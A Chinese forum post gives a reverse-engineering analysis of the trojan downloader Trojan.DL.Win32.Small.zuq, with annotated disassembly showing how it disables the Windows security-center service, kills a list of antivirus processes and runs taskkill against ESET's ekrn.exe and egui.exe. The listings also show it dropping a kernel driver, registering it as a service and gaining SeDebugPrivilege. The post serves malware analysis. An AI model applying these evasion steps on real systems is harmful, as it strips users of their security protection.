发帖回复

203阅读
3回复

[分享]Trojan.DL.Win32.Small.zuq简单分析

楼层直达

z3960

级别: 茶馆馆主

发帖: 770867

飞翔币: 207694

威望: 215657

飞扬币: 2511641

信誉值: 8

只看楼主更多操作 0 发表于: 2023-05-18

[font=-apple-system, BlinkMacSystemFont, &quot]文件: gr.exe[font=-apple-system, BlinkMacSystemFont, &quot]大小: 29184 字节[font=-apple-system, BlinkMacSystemFont, &quot]SHA1: 12C60FEFAE4865F8BFB8E9D169FA82A117F9BD1A[font=-apple-system, BlinkMacSystemFont, &quot]加壳类型:UPX[font=-apple-system, BlinkMacSystemFont, &quot]开发语言:Borland Delphi[font=-apple-system, BlinkMacSystemFont, &quot]瑞星扫描:Trojan.DL.Win32.Small.zuq[font=-apple-system, BlinkMacSystemFont, &quot]简单行为分析[font=-apple-system, BlinkMacSystemFont, &quot]1.创建一个名为"abcf"的互斥体：

004039E0 68 2C344000 push 0040342C ; ASCII "abcf"
004039E5 6A 01 push 1
004039E7 53 push ebx
004039E8 FF15 64104000 call dword ptr [<&kernel32.CreateMute>; 创建一个名为"abcf"的互斥体
004039EE FF15 60104000 call dword ptr [<&kernel32.GetLastErr>; ntdll.RtlGetLastWin32Error

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]2.禁止"wscsvc"服务：

004043F7 55 push ebp
004043F8 8BEC mov ebp, esp
004043FA 83EC 1C sub esp, 1C
004043FD 68 3F000F00 push 0F003F
00404402 6A 00 push 0
00404404 FF75 08 push dword ptr [ebp+8]
00404407 FF15 34104000 call dword ptr [<&ADVAPI32.OpenSCMana>; 打开服务管理器
0040440D 85C0 test eax, eax
0040440F 8945 08 mov dword ptr [ebp+8], eax
00404412 74 47 je short 0040445B
00404414 56 push esi
00404415 57 push edi
00404416 68 FF010F00 push 0F01FF
0040441B FF75 0C push dword ptr [ebp+C]
0040441E 50 push eax
0040441F FF15 04104000 call dword ptr [<&ADVAPI32.OpenServic>; 打开wscsvc服务
00404425 8B3D 08104000 mov edi, dword ptr [<&ADVAPI32.Close>; ADVAPI32.CloseServiceHandle
0040442B 8BF0 mov esi, eax
0040442D 85F6 test esi, esi
0040442F 74 23 je short 00404454
00404431 807D 10 00 cmp byte ptr [ebp+10], 0
00404435 74 0D je short 00404444
00404437 6A 00 push 0
00404439 6A 00 push 0
0040443B 56 push esi
0040443C FF15 24104000 call dword ptr [<&ADVAPI32.StartServi>; ADVAPI32.StartServiceA
00404442 EB 0D jmp short 00404451
00404444 8D45 E4 lea eax, dword ptr [ebp-1C]
00404447 50 push eax
00404448 6A 01 push 1
0040444A 56 push esi
0040444B FF15 30104000 call dword ptr [<&ADVAPI32.ControlSer>; 通过ControlService函数操作停止并禁止wscsvc服务

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]3.获取系统进程快照，将要查找的进程名字符串动态恢复到内存中后挂靠“.exe”，然后通过比较判断进程中是否存在“rstray.exe、rsnetsvr.exe、ccenter.exe、scanfrm.exe、ravmond.exe、ravtask.exe、rsmain.exe、rfwsrv.exe、ras.exe、kavstart.exe、kissvc.exe、kamilmon.exe、kpfw32.exe、kpfwsvc.exe、kwatch.exe、kaccore.exe”，如果存在则通过释放内存的方法结束进程

00403DD0 6A 00 push 0
00403DD2 6A 02 push 2
00403DD4 E8 A5060000 call <jmp.&kernel32.CreateToolhelp32S>; 创建系统快照
00403DD9 8BF0 mov esi, eax
00403DDB 6A 01 push 1
00403DDD 897424 0C mov dword ptr [esp+C], esi
00403DE1 FF15 A8104000 call dword ptr [<&kernel32.Sleep>] ; kernel32.Sleep
00403DE7 83FE FF cmp esi, -1
00403DEA 75 07 jnz short 00403DF3
00403DEC 33C0 xor eax, eax
00403DEE E9 77010000 jmp 00403F6A
00403DF3 53 push ebx
00403DF4 55 push ebp
00403DF5 8D4424 14 lea eax, dword ptr [esp+14]
00403DF9 57 push edi
00403DFA 50 push eax
00403DFB 56 push esi
00403DFC C74424 20 28010>mov dword ptr [esp+20], 128
00403E04 E8 6F060000 call <jmp.&kernel32.Process32First> ; 获取快照中的第一个进程句柄
00403E09 BB B0454000 mov ebx, 004045B0
00403E0E 85C0 test eax, eax
00403E10 0F84 DD000000 je 00403EF3
00403E16 33ED xor ebp, ebp
00403E18 8B3CAD 08334000 mov edi, dword ptr [ebp*4+403308]
00403E1F 83C9 FF or ecx, FFFFFFFF
00403E22 33C0 xor eax, eax
00403E24 53 push ebx
00403E25 F2:AE repne scas byte ptr es:[edi]
00403E27 F7D1 not ecx
00403E29 2BF9 sub edi, ecx
00403E2B 8BC1 mov eax, ecx
00403E2D 8BF7 mov esi, edi
00403E2F 8BFB mov edi, ebx
00403E31 C1E9 02 shr ecx, 2
00403E34 F3:A5 rep movs dword ptr es:[edi], dword p>
00403E36 8BC8 mov ecx, eax
00403E38 83E1 03 and ecx, 3
00403E3B F3:A4 rep movs byte ptr es:[edi], byte ptr>
00403E3D E8 35FEFFFF call 00403C77 ; 还原字符串到内存
00403E42 59 pop ecx
00403E43 BF AC344000 mov edi, 004034AC ; ASCII ".exe"
00403E48 83C9 FF or ecx, FFFFFFFF
00403E4B 33C0 xor eax, eax
00403E4D F2:AE repne scas byte ptr es:[edi]
00403E4F F7D1 not ecx
00403E51 2BF9 sub edi, ecx
00403E53 8BF7 mov esi, edi
00403E55 8BD1 mov edx, ecx
00403E57 8BFB mov edi, ebx
00403E59 83C9 FF or ecx, FFFFFFFF
00403E5C F2:AE repne scas byte ptr es:[edi]
00403E5E 8BCA mov ecx, edx
00403E60 4F dec edi
00403E61 C1E9 02 shr ecx, 2
00403E64 F3:A5 rep movs dword ptr es:[edi], dword p>
00403E66 8BCA mov ecx, edx
00403E68 83E1 03 and ecx, 3
00403E6B 85ED test ebp, ebp
00403E6D F3:A4 rep movs byte ptr es:[edi], byte ptr>
00403E6F 75 3A jnz short 00403EAB
00403E71 8BFB mov edi, ebx
00403E73 83C9 FF or ecx, FFFFFFFF
00403E76 F2:AE repne scas byte ptr es:[edi]
00403E78 F7D1 not ecx
00403E7A 2BF9 sub edi, ecx
00403E7C B8 98444000 mov eax, 00404498
00403E81 8BD1 mov edx, ecx
00403E83 8BF7 mov esi, edi
00403E85 8BF8 mov edi, eax
00403E87 50 push eax
00403E88 C1E9 02 shr ecx, 2
00403E8B F3:A5 rep movs dword ptr es:[edi], dword p>
00403E8D 8BCA mov ecx, edx
00403E8F 8D4424 40 lea eax, dword ptr [esp+40]
00403E93 83E1 03 and ecx, 3
00403E96 50 push eax
00403E97 F3:A4 rep movs byte ptr es:[edi], byte ptr>
00403E99 FF15 88104000 call dword ptr [<&kernel32.lstrcmpi>] ; 比较
00403E9F 85C0 test eax, eax
00403EA1 75 08 jnz short 00403EAB ; 如果不同跳00403EAB
00403EA3 C74424 10 01000>mov dword ptr [esp+10], 1
00403EAB 8BFB mov edi, ebx
00403EAD 83C9 FF or ecx, FFFFFFFF
00403EB0 33C0 xor eax, eax
00403EB2 F2:AE repne scas byte ptr es:[edi]
00403EB4 F7D1 not ecx
00403EB6 49 dec ecx
00403EB7 83F9 06 cmp ecx, 6
00403EBA 76 1A jbe short 00403ED6
00403EBC 8D4424 3C lea eax, dword ptr [esp+3C]
00403EC0 53 push ebx
00403EC1 50 push eax
00403EC2 FF15 88104000 call dword ptr [<&kernel32.lstrcmpi>] ; 比较
00403EC8 85C0 test eax, eax
00403ECA 75 0A jnz short 00403ED6 ; 如果不同跳00403ED6
00403ECC FF7424 20 push dword ptr [esp+20]
00403ED0 E8 86FEFFFF call 00403D5B ; 如果上述进程存在则顺序走到这，通过VirtualFreeEx释放内存结束进程
00403ED5 59 pop ecx
00403ED6 45 inc ebp
00403ED7 83FD 12 cmp ebp, 12
00403EDA ^ 0F8E 38FFFFFF jle 00403E18
00403EE0 8D4424 18 lea eax, dword ptr [esp+18]
00403EE4 50 push eax
00403EE5 FF7424 18 push dword ptr [esp+18]
00403EE9 E8 84050000 call <jmp.&kernel32.Process32Next> ; 获取下一个进程句柄
00403EEE ^ E9 1BFFFFFF jmp 00403E0E ; 跳00403E0E进行下一个比较

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]4.创建一个线程，主线程挂起

00403F8F FF15 98104000 call dword ptr [401098] ; 创建线程
00403F95 8BF0 mov esi, eax
00403F97 6A FF push -1
00403F99 56 push esi
00403F9A FF15 94104000 call dword ptr [401094] ; 等待线程退出

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]线程执行[font=-apple-system, BlinkMacSystemFont, &quot]获取临时文件夹目录，GetTickCount获取系统开机时间数挂靠“.t”后得到一个随机数文件名~1476b8.t，临时文件夹创建文件，解密字符串得到命令行“%temp%\~1476b8.t,AboutDlgProc 18”，通过解密字符串得到avp.exe、safeboxtray.exe、360tray.exe进程名，查找进程中是否存在以上进程，如果有则创建进程rundll32.exe执行命令行

0040422B FF15 58104000 call dword ptr [<&kernel32.GetTempPat>; 获取临时文件夹目录
00404231 FF15 54104000 call dword ptr [<&kernel32.GetTickCou>; 获取系统开机时间数
00404237 83C0 03 add eax, 3
0040423A 50 push eax
0040423B 8D85 58FCFFFF lea eax, dword ptr [ebp-3A8]
00404241 50 push eax
00404242 8D85 5CFDFFFF lea eax, dword ptr [ebp-2A4]
00404248 68 34354000 push 00403534 ; %s~%x.t
0040424D 50 push eax
0040424E FF15 FC104000 call dword ptr [<&USER32.wsprintfA>] ; USER32.wsprintfA
00404254 8D85 5CFDFFFF lea eax, dword ptr [ebp-2A4]
0040425A 50 push eax
0040425B E8 6EF9FFFF call 00403BCE ; 创建文件%temp%\~1476b8.t
00404260 83C4 14 add esp, 14
00404263 68 F4010000 push 1F4
00404268 FF15 A8104000 call dword ptr [<&kernel32.Sleep>] ; kernel32.Sleep
0040426E BF 30354000 mov edi, 00403530
00404273 8BCB mov ecx, ebx
00404275 33C0 xor eax, eax
00404277 8D95 60FEFFFF lea edx, dword ptr [ebp-1A0]
0040427D F2:AE repne scas byte ptr es:[edi]
0040427F F7D1 not ecx
00404281 2BF9 sub edi, ecx
00404283 8BF7 mov esi, edi
00404285 8BC1 mov eax, ecx
00404287 8BFA mov edi, edx
00404289 C1E9 02 shr ecx, 2
0040428C F3:A5 rep movs dword ptr es:[edi], dword p>
0040428E 8BC8 mov ecx, eax
00404290 33C0 xor eax, eax
00404292 83E1 03 and ecx, 3
00404295 8D95 60FEFFFF lea edx, dword ptr [ebp-1A0]
0040429B F3:A4 rep movs byte ptr es:[edi], byte ptr>
0040429D 8DBD 5CFDFFFF lea edi, dword ptr [ebp-2A4]
004042A3 8BCB mov ecx, ebx
004042A5 F2:AE repne scas byte ptr es:[edi]
004042A7 F7D1 not ecx
004042A9 2BF9 sub edi, ecx
004042AB 8BF7 mov esi, edi
004042AD 8BFA mov edi, edx
004042AF 8BD1 mov edx, ecx
004042B1 8BCB mov ecx, ebx
004042B3 F2:AE repne scas byte ptr es:[edi]
004042B5 8BCA mov ecx, edx
004042B7 4F dec edi
004042B8 C1E9 02 shr ecx, 2
004042BB F3:A5 rep movs dword ptr es:[edi], dword p>
004042BD 8BCA mov ecx, edx
004042BF 8D45 CC lea eax, dword ptr [ebp-34]
004042C2 83E1 03 and ecx, 3
004042C5 50 push eax
004042C6 F3:A4 rep movs byte ptr es:[edi], byte ptr>
004042C8 BE 20354000 mov esi, 00403520 ; :khqsn:^u:xqa
004042CD 8D7D CC lea edi, dword ptr [ebp-34]
004042D0 A5 movs dword ptr es:[edi], dword ptr [e>
004042D1 A5 movs dword ptr es:[edi], dword ptr [e>
004042D2 A5 movs dword ptr es:[edi], dword ptr [e>
004042D3 66:A5 movs word ptr es:[edi], word ptr [esi>
004042D5 E8 65F9FFFF call 00403C3F ; 解密字符串“AboutDlgProc”
004042DA 8D7D CC lea edi, dword ptr [ebp-34]
004042DD 8BCB mov ecx, ebx
004042DF 33C0 xor eax, eax
004042E1 8D95 60FEFFFF lea edx, dword ptr [ebp-1A0]
004042E7 F2:AE repne scas byte ptr es:[edi]
004042E9 F7D1 not ecx
004042EB 2BF9 sub edi, ecx
004042ED 8BF7 mov esi, edi
004042EF 8BFA mov edi, edx
004042F1 8BD1 mov edx, ecx
004042F3 8BCB mov ecx, ebx
004042F5 F2:AE repne scas byte ptr es:[edi]
004042F7 8BCA mov ecx, edx
004042F9 4F dec edi
004042FA C1E9 02 shr ecx, 2
004042FD F3:A5 rep movs dword ptr es:[edi], dword p>
004042FF 8BCA mov ecx, edx
00404301 8D95 60FEFFFF lea edx, dword ptr [ebp-1A0]
00404307 83E1 03 and ecx, 3
0040430A F3:A4 rep movs byte ptr es:[edi], byte ptr>
0040430C BF 1C354000 mov edi, 0040351C ; 18
00404311 8BCB mov ecx, ebx
00404313 F2:AE repne scas byte ptr es:[edi]
00404315 F7D1 not ecx
00404317 2BF9 sub edi, ecx
00404319 8BF7 mov esi, edi
0040431B 8BFA mov edi, edx
0040431D 8BD1 mov edx, ecx
0040431F 8BCB mov ecx, ebx
00404321 F2:AE repne scas byte ptr es:[edi]
00404323 8BCA mov ecx, edx
00404325 4F dec edi
00404326 C1E9 02 shr ecx, 2
00404329 F3:A5 rep movs dword ptr es:[edi], dword p>
0040432B 8BCA mov ecx, edx
0040432D 8D45 E8 lea eax, dword ptr [ebp-18]
00404330 83E1 03 and ecx, 3
00404333 50 push eax
00404334 F3:A4 rep movs byte ptr es:[edi], byte ptr>
00404336 BE 14354000 mov esi, 00403514 ; o}vgp
0040433B 8D7D E8 lea edi, dword ptr [ebp-18]
0040433E A5 movs dword ptr es:[edi], dword ptr [e>
0040433F 66:A5 movs word ptr es:[edi], word ptr [esi>
00404341 BE 0C354000 mov esi, 0040350C ; 筒断
00404346 8D7D F0 lea edi, dword ptr [ebp-10]
00404349 A5 movs dword ptr es:[edi], dword ptr [e>
0040434A A4 movs byte ptr es:[edi], byte ptr [esi>
0040434B E8 EFF8FFFF call 00403C3F
00404350 8D45 F0 lea eax, dword ptr [ebp-10]
00404353 50 push eax
00404354 E8 E6F8FFFF call 00403C3F
00404359 BE FC344000 mov esi, 004034FC
0040435E 8D7D AC lea edi, dword ptr [ebp-54]
00404361 A5 movs dword ptr es:[edi], dword ptr [e>
00404362 A5 movs dword ptr es:[edi], dword ptr [e>
00404363 A5 movs dword ptr es:[edi], dword ptr [e>
00404364 A1 F4344000 mov eax, dword ptr [4034F4]
00404369 A5 movs dword ptr es:[edi], dword ptr [e>
0040436A BE E8344000 mov esi, 004034E8
0040436F 8D7D DC lea edi, dword ptr [ebp-24]
00404372 A5 movs dword ptr es:[edi], dword ptr [e>
00404373 8945 F8 mov dword ptr [ebp-8], eax
00404376 A1 F8344000 mov eax, dword ptr [4034F8]
0040437B A5 movs dword ptr es:[edi], dword ptr [e>
0040437C 8945 FC mov dword ptr [ebp-4], eax
0040437F 8D45 F8 lea eax, dword ptr [ebp-8]
00404382 50 push eax
00404383 A5 movs dword ptr es:[edi], dword ptr [e>
00404384 E8 EEF8FFFF call 00403C77 ; 解密字符串“avp.exe”
00404389 8D45 AC lea eax, dword ptr [ebp-54]
0040438C 50 push eax
0040438D E8 E5F8FFFF call 00403C77 ; 解密“safeboxtray.exe”
00404392 8D45 DC lea eax, dword ptr [ebp-24]
00404395 50 push eax
00404396 E8 DCF8FFFF call 00403C77 ; 解密“360tray.exe”
0040439B 8D45 DC lea eax, dword ptr [ebp-24]
0040439E 50 push eax
0040439F E8 12FDFFFF call 004040B6 ; 查找进程中是否存在360tray.exe
004043A4 8BF0 mov esi, eax
004043A6 8D45 AC lea eax, dword ptr [ebp-54]
004043A9 50 push eax
004043AA E8 07FDFFFF call 004040B6 ; 查找进程中是否存在safeboxtray.exe
004043AF 0BF0 or esi, eax
004043B1 8D45 F8 lea eax, dword ptr [ebp-8]
004043B4 50 push eax
004043B5 E8 FCFCFFFF call 004040B6 ; 查找进程中是否存在avp.exe
004043BA 83C4 24 add esp, 24
004043BD 0BF0 or esi, eax
004043BF 74 31 je short 004043F2 ; 如果不存在跳004043F2
004043C1 8D85 60FEFFFF lea eax, dword ptr [ebp-1A0]
004043C7 50 push eax
004043C8 8D85 48FFFFFF lea eax, dword ptr [ebp-B8]
004043CE 50 push eax
004043CF E8 62FDFFFF call 00404136 ; 如果存在以上某个进程则直走到这，创建进程rundll32.exe执行命令行“%Temp%\~1476b8.t,AboutDlgProc 18”
004043D4 8B35 A8104000 mov esi, dword ptr [<&kernel32.Sleep>; kernel32.Sleep
004043DA 6A 64 push 64
004043DC FFD6 call esi
004043DE 8D85 5CFDFFFF lea eax, dword ptr [ebp-2A4]
004043E4 50 push eax
004043E5 FF15 C4104000 call dword ptr [<&kernel32.DeleteFile>; 删除%temp%\~1476b8.t
004043EB 68 204E0000 push 4E20
004043F0 FFD6 call esi ; 暂停20秒

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]退出线程

7C80B714 E8 CF090000 call ExitThread

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]5.尝试打开erkn服务，如果服务存在修改启动方式禁止服务，并执行命令行结束ekrn.exe和egui.exe进程

00404017 BE E0344000 mov esi, 004034E0 ; ASCII "suxp"
0040401C 8D7D F8 lea edi, dword ptr [ebp-8]
0040401F 8D45 F8 lea eax, dword ptr [ebp-8]
00404022 A5 movs dword ptr es:[edi], dword ptr [e>
00404023 50 push eax
00404024 A4 movs byte ptr es:[edi], byte ptr [esi>
00404025 E8 15FCFFFF call 00403C3F ; 解密字符串“ekrn”
0040402A 8D45 F8 lea eax, dword ptr [ebp-8]
0040402D 6A 04 push 4
0040402F 50 push eax
00404030 E8 7CFFFFFF call 00403FB1 ; 尝试打开ekrn服务，如果服务存在就通过ChangeServiceConfigA修改启动方式禁止服务
00404035 BE D4344000 mov esi, 004034D4
0040403A 8D7D EC lea edi, dword ptr [ebp-14]
0040403D A5 movs dword ptr es:[edi], dword ptr [e>
0040403E A5 movs dword ptr es:[edi], dword ptr [e>
0040403F 8D45 EC lea eax, dword ptr [ebp-14]
00404042 50 push eax
00404043 A4 movs byte ptr es:[edi], byte ptr [esi>
00404044 E8 F6FBFFFF call 00403C3F ; 解密字符串"taskkill"
00404049 BE C4344000 mov esi, 004034C4
0040404E 8D7D DC lea edi, dword ptr [ebp-24]
00404051 A5 movs dword ptr es:[edi], dword ptr [e>
00404052 A5 movs dword ptr es:[edi], dword ptr [e>
00404053 A5 movs dword ptr es:[edi], dword ptr [e>
00404054 8D45 DC lea eax, dword ptr [ebp-24]
00404057 50 push eax
00404058 A5 movs dword ptr es:[edi], dword ptr [e>
00404059 E8 E1FBFFFF call 00403C3F0012FF14 0012FF44 ; 解密字符串"/f /im ekrn.exe"
0040405E BE B4344000 mov esi, 004034B4
00404063 8D7D CC lea edi, dword ptr [ebp-34]
00404066 A5 movs dword ptr es:[edi], dword ptr [e>
00404067 A5 movs dword ptr es:[edi], dword ptr [e>
00404068 A5 movs dword ptr es:[edi], dword ptr [e>
00404069 8D45 CC lea eax, dword ptr [ebp-34]
0040406C 50 push eax
0040406D A5 movs dword ptr es:[edi], dword ptr [e>
0040406E E8 CCFBFFFF call 00403C3F ; 解密字符串"/f /im egui.exe"
00404073 8B35 B4104000 mov esi, dword ptr [4010B4] ; kernel32.GetCurrentThreadId
00404079 83C4 18 add esp, 18
0040407C FFD6 call esi
0040407E 33DB xor ebx, ebx
00404080 8B3D F0104000 mov edi, dword ptr [4010F0]
00404086 53 push ebx
00404087 8D45 DC lea eax, dword ptr [ebp-24]
0040408A 53 push ebx
0040408B 50 push eax
0040408C 8D45 EC lea eax, dword ptr [ebp-14]
0040408F 50 push eax
00404090 53 push ebx
00404091 53 push ebx
00404092 FFD7 call edi ; ShellExecuteA运行taskkill.exe,执行“taskkill.exe /f /im ekrn.exe”
00404094 68 D0070000 push 7D0
00404099 FF15 A8104000 call dword ptr [4010A8] ; 暂停2秒
0040409F FFD6 call esi
004040A1 53 push ebx
004040A2 8D45 CC lea eax, dword ptr [ebp-34]
004040A5 53 push ebx
004040A6 50 push eax
004040A7 8D45 EC lea eax, dword ptr [ebp-14]
004040AA 50 push eax
004040AB 53 push ebx
004040AC 53 push ebx
004040AD FFD7 call edi ; ShellExecuteA运行taskkill.exe,执行“taskkill.exe /f /im egui.exe”
禁止ekrn服务部分代码
00404030 E8 7CFFFFFF call 00403FB1
进入call代码
00403FB1 55 push ebp
00403FB2 8BEC mov ebp, esp
00403FB4 51 push ecx
00403FB5 56 push esi
00403FB6 33F6 xor esi, esi
00403FB8 68 3F000F00 push 0F003F
00403FBD 56 push esi
00403FBE 56 push esi
00403FBF FF15 34104000 call dword ptr [401034] ; 打开服务管理器
00403FC5 3BC6 cmp eax, esi
00403FC7 8945 FC mov dword ptr [ebp-4], eax
00403FCA 74 3F je short 0040400B
00403FCC 53 push ebx
00403FCD 57 push edi
00403FCE 68 FF010F00 push 0F01FF
00403FD3 FF75 08 push dword ptr [ebp+8]
00403FD6 50 push eax
00403FD7 FF15 04104000 call dword ptr [401004] ; 打开ekrn服务
00403FDD 8B3D 08104000 mov edi, dword ptr [401008] ; ADVAPI32.CloseServiceHandle
00403FE3 8BD8 mov ebx, eax
00403FE5 3BDE cmp ebx, esi
00403FE7 74 1B je short 00404004 ; 如果不存在该服务跳00404004
00403FE9 56 push esi
00403FEA 56 push esi
00403FEB 56 push esi
00403FEC 56 push esi
00403FED 56 push esi
00403FEE 56 push esi
00403FEF 56 push esi
00403FF0 6A FF push -1
00403FF2 FF75 0C push dword ptr [ebp+C]
00403FF5 68 10010000 push 110
00403FFA 53 push ebx
00403FFB FF15 2C104000 call dword ptr [40102C] ; 若存在该服务顺序走到这，通过ChangeServiceConfigA修改服务启动方式，禁止ekrn服务

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]6.临时文件夹创建文件

004038E9 55 push ebp
004038EA 8BEC mov ebp, esp
004038EC 83EC 70 sub esp, 70
004038EF 53 push ebx
004038F0 56 push esi
004038F1 57 push edi
004038F2 BE 14344000 mov esi, 00403414
004038F7 8D7D F4 lea edi, dword ptr [ebp-C]
004038FA 8D45 F4 lea eax, dword ptr [ebp-C]
004038FD A5 movs dword ptr es:[edi], dword ptr [e>
004038FE A5 movs dword ptr es:[edi], dword ptr [e>
004038FF 50 push eax
00403900 66:A5 movs word ptr es:[edi], word ptr [esi>
00403902 E8 38030000 call 00403C3F ; 解密字符串“%s~%x.tmp”
00403907 59 pop ecx ; 0012FF5C
00403908 8D45 90 lea eax, dword ptr [ebp-70]
0040390B 50 push eax
0040390C 6A 64 push 64
0040390E FF15 58104000 call dword ptr [401058] ; 获取临时文件夹目录%temp%
00403914 8B3D 54104000 mov edi, dword ptr [401054]
0040391A FFD7 call edi ; 获取系统开机时间数得到一组随机数字
0040391C 83C0 16 add eax, 16
0040391F 8B1D FC104000 mov ebx, dword ptr [4010FC] ; USER32.wsprintfA
00403925 50 push eax
00403926 8D45 90 lea eax, dword ptr [ebp-70]
00403929 50 push eax
0040392A 8D45 F4 lea eax, dword ptr [ebp-C]
0040392D BE CC454000 mov esi, 004045CC
00403932 50 push eax
00403933 56 push esi
00403934 FFD3 call ebx ; 将得到的数字字符输入缓冲区得到映像路径"%temp%\~74e66a.tmp"
00403936 56 push esi
00403937 68 10344000 push 00403410 ; ASCII "ico"
0040393C 68 0C344000 push 0040340C
00403941 E8 6AFEFFFF call 004037B0
00403946 83C4 1C add esp, 1C
00403949 85C0 test eax, eax
0040394B 74 16 je short 00403963
0040394D 68 08344000 push 00403408 ; ASCII "xx"
00403952 FF15 C4104000 call dword ptr [4010C4] ; kernel32.DeleteFileA
00403958 85C0 test eax, eax
0040395A 75 07 jnz short 00403963
0040395C 56 push esi
0040395D E8 3EFFFFFF call 004038A0 ; 创建文件%temp%\~74e66a.tmp(一个exe的可执行文件)
进入call代码
004038AC 6A 01 push 1
004038AE 68 000000C0 push C0000000
004038B3 FF75 08 push dword ptr [ebp+8]
004038B6 FF15 B0104000 call dword ptr [4010B0] ; 创建文件
004038BC 56 push esi
004038BD 8BF8 mov edi, eax
004038BF 56 push esi
004038C0 6A 01 push 1
004038C2 57 push edi
004038C3 FF15 50104000 call dword ptr [401050] ; 设置文件指针
004038C9 8D45 08 lea eax, dword ptr [ebp+8]
004038CC 56 push esi
004038CD 50 push eax
004038CE 6A 01 push 1
004038D0 68 00344000 push 00403400
004038D5 57 push edi
004038D6 FF15 70104000 call dword ptr [401070] ; 写入文件
00403962 59 pop ecx
00403963 FFD7 call edi ; 获取系统开机时间数
00403965 83C0 15 add eax, 15
00403968 BE AC444000 mov esi, 004044AC
0040396D 50 push eax
0040396E 8D45 90 lea eax, dword ptr [ebp-70]
00403971 50 push eax
00403972 8D45 F4 lea eax, dword ptr [ebp-C]
00403975 50 push eax
00403976 56 push esi
00403977 FFD3 call ebx ; 得到路径"%temp%\~74e66a.tmp"
00403979 56 push esi
0040397A 68 10344000 push 00403410 ; ASCII "ico"
0040397F 68 04344000 push 00403404
00403984 E8 27FEFFFF call 004037B0 ; 创建文件%temp%\~74e66a.tmp，查找自身资源“ico”中名为“D”的资源写入文件（一个驱动文件）

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]7.运行~7c963f.tmp

004036DA 57 push edi
004036DB 50 push eax
004036DC E8 5E050000 call 00403C3F ; 解密字符串"\\.\ao1"
004036E1 8D85 F0FEFFFF lea eax, dword ptr [ebp-110]
004036E7 C70424 04010000 mov dword ptr [esp], 104
004036EE 33FF xor edi, edi
004036F0 50 push eax
004036F1 57 push edi
004036F2 FF15 A4104000 call dword ptr [4010A4] ; kernel32.GetModuleFileNameA
004036F8 68 A8DE0000 push 0DEA8
004036FD FF15 A8104000 call dword ptr [4010A8] ; 暂停57秒
00403703 6A 05 push 5
00403705 68 AC444000 push 004044AC
0040370A FF15 AC104000 call dword ptr [4010AC] ; 运行~7c963f.tmp

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]8.提权

00403710 E8 4BFEFFFF call 00403560 ; 为进程提升SeDebugPrivilege权限
进入call代码
00403560 55 push ebp
00403561 8BEC mov ebp, esp
00403563 83EC 14 sub esp, 14
00403566 FF15 D4104000 call dword ptr [4010D4] ; kernel32.GetCurrentProcess
0040356C 8D4D FC lea ecx, dword ptr [ebp-4]
0040356F 51 push ecx
00403570 6A 28 push 28
00403572 50 push eax
00403573 FF15 0C104000 call dword ptr [40100C] ; ADVAPI32.OpenProcessToken
00403579 85C0 test eax, eax
0040357B 74 40 je short 004035BD
0040357D 8D45 F0 lea eax, dword ptr [ebp-10]
00403580 56 push esi
00403581 50 push eax
00403582 33F6 xor esi, esi
00403584 68 E0334000 push 004033E0 ; ASCII "SeDebugPrivilege"
00403589 56 push esi
0040358A FF15 10104000 call dword ptr [401010] ; ADVAPI32.LookupPrivilegeValueA
00403590 85C0 test eax, eax
00403592 74 1F je short 004035B3
00403594 56 push esi
00403595 56 push esi
00403596 8D45 EC lea eax, dword ptr [ebp-14]
00403599 56 push esi
0040359A 50 push eax
0040359B 56 push esi
0040359C FF75 FC push dword ptr [ebp-4]
0040359F C745 EC 0100000>mov dword ptr [ebp-14], 1
004035A6 C745 F8 0200000>mov dword ptr [ebp-8], 2
004035AD FF15 14104000 call dword ptr [401014] ; ADVAPI32.AdjustTokenPrivileges

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]9.创建服务zx并启动服务，并删除文件

0040366E 55 push ebp
0040366F 8BEC mov ebp, esp
00403671 83EC 1C sub esp, 1C
00403674 FF75 08 push dword ptr [ebp+8]
00403677 68 F4334000 push 004033F4 ; ASCII "zx"
0040367C E8 83FFFFFF call 00403604 ; 创建服务
代码：
00403652 FF15 00104000 call dword ptr [401000] ; ADVAPI32.CreateServiceA
0012FDD4 00173170 |hManager = 00173170
0012FDD8 004033F4 |ServiceName = "zx"
0012FDDC 004033F4 |DisplayName = "zx"
0012FDE0 000F01FF |DesiredAccess = SERVICE_ALL_ACCESS
0012FDE4 00000001 |ServiceType = SERVICE_KERNEL_DRIVER
0012FDE8 00000003 |StartType = SERVICE_DEMAND_START
0012FDEC 00000001 |ErrorControl = SERVICE_ERROR_NORMAL
0012FDF0 004045CC |BinaryPathName = "%temp%\~74e66a.tmp"
0012FDF4 00000000 |LoadOrderGroup = NULL
0012FDF8 00000000 |pTagId = NULL
0012FDFC 00000000 |pDependencies = NULL
0012FE00 00000000 |ServiceStartName = NULL
0012FE04 00000000 \Password = NULL
00403681 59 pop ecx
00403682 A3 D8464000 mov dword ptr [4046D8], eax
00403687 85C0 test eax, eax
00403689 59 pop ecx
0040368A 74 25 je short 004036B1
0040368C 8D4D E4 lea ecx, dword ptr [ebp-1C]
0040368F 51 push ecx
00403690 50 push eax
00403691 FF15 28104000 call dword ptr [401028] ; 查询服务状态
00403697 85C0 test eax, eax
00403699 74 06 je short 004036A1 ; 如果服务未启动跳004036A1
0040369B 837D E8 04 cmp dword ptr [ebp-18], 4
0040369F 74 10 je short 004036B1 ; 如果服务已运行跳004036B1
004036A1 6A 00 push 0
004036A3 6A 00 push 0
004036A5 FF35 D8464000 push dword ptr [4046D8]
004036AB FF15 24104000 call dword ptr [401024] ; 开启服务
004036B1 FF75 08 push dword ptr [ebp+8]
004036B4 FF15 C4104000 call dword ptr [4010C4] ; 删除文件

复制代码[font=-apple-system, BlinkMacSystemFont, &quot]10.加载驱动，通过DeviceIoControl操作修改系统文件达到穿还原

00403736 68 00000080 push 80000000
0040373B 50 push eax
0040373C FF15 B0104000 call dword ptr [4010B0] ; 尝试打开一个设备"\\.\ao1"，如果设备不存在则通过CreateDevice、CreateSymbolicLink创建设备和符号连接
00403742 8BD8 mov ebx, eax
00403744 83FB FF cmp ebx, -1
00403747 74 3D je short 00403786
00403749 FF15 B4104000 call dword ptr [4010B4] ; kernel32.GetCurrentThreadId
